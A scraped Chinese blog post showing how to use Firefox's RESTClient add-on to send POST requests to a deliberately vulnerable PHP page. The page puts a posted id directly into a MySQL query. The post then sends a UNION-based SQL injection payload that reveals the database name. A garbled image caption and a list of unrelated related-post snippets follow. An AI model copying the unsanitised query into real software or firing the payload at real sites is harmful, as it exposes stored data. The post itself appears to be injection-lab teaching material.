2. 程式人生 > >使用FireFox外掛RESTClient工具POST方法?

使用FireFox外掛RESTClient工具POST方法?

阿新 發佈:2018-12-20

貼出php程式碼

<html>
<body>
<?php
$con = mysql_connect("localhost","root","root");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
else
{
   mysql_select_db("test");

   $id = $_POST['id'];
$query ="select * from zhuru where Id=$id";
$result = mysql_query($query);
$info= mysql_fetch_array($result);    
$re_num = mysql_num_rows($result);
        if($info==FALSE)
        {
            echo "抱歉,您的訂餐資訊沒有查到!";
        }
        else
        {
                echo "<form action='index.php' method='post' name='chakanform'>";
                echo "<table>";
                echo "<tr>";
                echo "<h3>你的訂餐記錄是:</h3>";
                echo "</tr>";
                echo "<tr>";
                echo "<td>";
                echo "序號:";
                echo "</td>";
                echo "<td>";
                echo "菜品:";
                echo "</td>";
                echo "<td>";
                echo "訂餐時間";
                echo "</td>";
                echo "<td>";
                echo "訂餐時間";
                echo "</td>";
                echo "<td>";
                echo "訂餐時間";
                echo "</td>";
                echo "<td>";
                echo "訂餐時間";
                echo "</td>";
                                echo "<td>";
                echo "訂餐時間";
                echo "</td>";
                echo "<td>";
                echo "訂餐時間";
                echo "</td>";                                
                echo "</tr>";
                do
                {
                    $xuhao++;    
                    echo "<tr>";
                    echo "<td>";
                    echo $xuhao;
                    echo "</td>";
                    echo "<td>";
                    echo $info[username];
                    echo "</td>";
                    echo "<td>";
                    echo $info[password];
                    echo "</td>";
                    echo "<td>";
                    echo $info[id];
                    echo "</td>";
                            echo "<td>";
                    echo $info[tushu];
                    echo "</td>";
                    echo "<td>";
                    echo $info[dizhi];
                    echo "</td>";
                    echo "</tr>";
                }
                while($info= @mysql_fetch_array($result));
                echo "</table>";
                echo "</form>";    
        }
mysql_close($con);
}

?>
</body>
</html>

 

 

注意新增訊息頭

è¿éåå¾çæè¿°

配置如上

然後修改正文的內容

id=1 and 1=2 union select 1,2,3,4,database()

進行注入即可

 

相關推薦

使用FireFox外掛RESTClient工具POST方法

貼出php程式碼 <html> <body> <?php $con = mysql_connect("localhost","root","root"); if (!$con)   {   die('Could not connect: ' .

FireFox外掛RESTClient POST請求帶json資料

火狐外掛RestClient用於傳送Http請求還是很方便。 如何發Json資料 1、設定header 選擇costom-header後設置Json資料格式 Content-type:application/json 設定成功後 設

使用Mozilla Firefox外掛RestClient測試Http API介面

RESTClient是Mozilla Firefox一個用於測試http請求外掛。在火狐附加元件裡面查詢並安裝,非常小巧,介面非常簡單,使用非常的方便,看下面這張圖你就全明白了,希望對新手有幫助! 1、開啟火狐擴充套件搜尋RESTClient進行安裝並重啟瀏覽器

Apache ab測試工具使用方法(無參、get傳參、post傳參)(轉)

結果 文字 測試結果 方法 htm .html 但我 apache2.4 請求 轉自Apache ab測試工具使用方法(無參、get傳參、post傳參) Ab測試工具是apache自帶的測試工具,具有簡單易上手的特性,下面我總結一下我的使用方法,首先去官方下載apache程

HttpClient 的GET(帶參數)、POST請求方式,工具方法

類方法 pre operator his socket ram 斷開 || -s /** * 連接/斷開操作 post方式 * @param url * @param json */ private boolean connOrDisconnOperator(Str

SpringMVC 使用uploadify外掛上傳檔案,post方法無法直接獲取引數問題

最近專案做安全掃描,掃描到一個問題,uploadify外掛請求型別不能為get,必須改成post,當時以為很簡單,可是修改成post後發現一個問題就是無法獲取引數了: 程式碼如下:          原先get方式如file,title引數都是可以直接獲取的,但是改成p

【學習筆記】Firefoxrestclient外掛是個好東東~

1.啟動tomcat 7.0後,Firefox瀏覽器輸入localhost:8080/abc123, 2.點選Firefox右上角的restclient外掛圖示,其餘見圖 BTW,要是檢視資料庫中的所有記錄,URL以traffics.json結尾,這樣restclient

找xpath好用的工具Firefox外掛

WebDriver Element Locator 安裝 在搜尋框裡輸入WebDriver Element Locator 點選Add to firefox 會有個彈出框,點選install now 可以看從firefox瀏覽器的menu -

HttpClient 的GET(帶引數)、POST請求方式,工具方法

/** * 連線/斷開操作 post方式 * @param url * @param json */ private boolean connOrDisconnOperator(String url,String json){ CloseableHttpClie

簡單get/post方法http請求工具類,帶head引數

package com.***.util; import java.io.IOException; import java.io.UnsupportedEncodingException; import java.net.URISyntaxException; import

javascript重定向頁面並用post方法傳遞消息

script asc 添加 方法 名稱 bsp 參數 頁面 form javascript中重定向頁面得方法很多,同時能傳遞消息的也不少;但可用post方法傳遞的我只找到兩種; 第一種方法:用document.write在 JavaScript函數中,用document.w

PHP curl 封裝 GET及POST方法

apple ram curl lds con pos post方法 init timeout function curl_get($url, array $params = array(), $timeout = 5) { $ch = curl_init();

使用Post方法模擬登陸爬取網頁(轉)

source tin -m quest exc agen false buffered void 使用Post方法模擬登陸爬取網頁 最近弄爬蟲,遇到的一個問題就是如何使用post方法模擬登陸爬取網頁。下面是極簡版的代碼: import java

google瀏覽器安裝接口測試工具postman方法

ext ref 擴展 bsp 位置 targe 字符串替換 好的 配置 Google安裝postman: 未配好的文件下載(可選下面配好的直接用):下載 配置方法: 一:需要修改postman安裝包中js/requester.js 和runner.js ,將其中的aicm

post方法

method ace color sys logs generic class sin .net post方法using System; using System.Collections.Generic; using System.IO; using System.Lin

cloc代碼統計工具使用方法

接下來 svn star 工作 ror 兩個文件 命令 lock ont 1.cloc簡介 cloc是用perl開發的代碼行數統計工具,支持多種編程語言,同樣也支持verilog。 之前在sourceforge上開發,現在已經轉移到github上。 目前的開發

resttemplate post方法

headers com 封裝 exceptio findall ntb object lar nbsp @Component @Slf4j public class StatisticsService { private final RestTemplate re

linux下常見內存異常查證工具方法介紹

linux 內存異常 efence 函數棧linux下常見內存異常查證工具和方法介紹內存異常導致的異常往往很難查證,本文介紹在linux下的各種常見內存異常的查證工具和方法。1、訪問空指針/未初始化指針這個是最簡單的內存異常了,只要能夠生成coredump文件,可以快速定位問題代碼。開啟coredump部分

Centos下tmux工具使用方法

repos info entos 識別 install centos6 inf wget div Tmux架構圖 Tmux使用C/S模型構建,主要包括以下單元模塊: 一個tmux命令執行後啟動一個tmux服務 一個tmux服務可以擁有多個session,一個sessio

jsp頁面post方法傳遞漢字

post方法 parameter coder char 無法 學習java code 了解 找到 由於工作壓力這兩天開始學習java web開發,上個學期在學校剛學了java課,暑假時也自學過安卓開發,只不過都是照著抄代碼,為了找個好工作。從現在開始好好學。 好